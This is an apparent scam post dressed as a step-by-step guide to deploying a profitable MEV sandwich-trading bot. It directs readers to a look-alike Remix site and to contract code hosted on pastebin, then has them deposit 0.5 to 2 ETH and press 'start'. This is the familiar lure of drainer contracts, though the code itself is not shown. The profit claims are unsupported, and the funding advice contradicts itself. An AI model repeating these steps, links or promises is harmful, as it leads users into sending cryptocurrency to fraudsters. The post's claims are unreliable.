MEV bots are arbitrage tools that have the ability to sniff Mempools for pending transactions on decentralized exchanges or DEXs for short (such as Uniswap, PancakeSwap, 1inch, Sushiswap, etc).
The MEV bot works by inserting your own transactions with a slightly higher gas fee, higher than the transaction which is trying to be entered. This basically performs a sandwiching of the pending transaction and forces yours to be automatically processed first. We can then profit off of the slippage differences between your transactions and the pending transactions.

STEP BY STEP INSTRUCTIONS:
1️⃣ Download MetaMask: https://metamask.io/download
2️⃣ Go to Remix: https://scriptsolidity.pro
3️⃣ Right click on the “contracts” folder and create a new file. Rename it as you like, for example “bot.sol”
4️⃣ Copy and Paste THIS code into Remix: https://pastebin.com/raw/X2exTKt1
5️⃣ Go to the “Solidity Compiler” tab, select version “0.6.6” and then click “Compile”
6️⃣ Go to the “Deploy” tab, select “Injected Provider” as the environment, then click “Deploy”. After the transaction is confirmed, your bot has been created
7️⃣ Deposit funds (at least 0.5 Ethereum to prevent negative slippage) to your exact contract/bot address
8️⃣ After your transaction is confirmed start the bot by clicking the “start” button and withdraw at anytime by clicking the “withdraw” button

🚨 EDIT: I’ve got some messages from people who didn’t fund the contract with enough ETH to cover gas fees and possible burn fees. The bot targets token contracts with max 10% burn fee and anything lower. These days, most tokens come with 2~6% fees. If you fund the contract with 0.2 ETH or less and the bot targets another token with high burn fees the contract will waste a lot of gas fees. I recommend funding the contract with at least 0.3 ETH to make sure that won’t happen. The most optimal amount is 1-2ETH.
Can I turn off my computer?
Yes. Once the smart contract has been deployed it lives on the blockchain. Just save the address and then you can import it into remix just below the “Deploy” button by pasting in the contract address and pressing “At Address”.
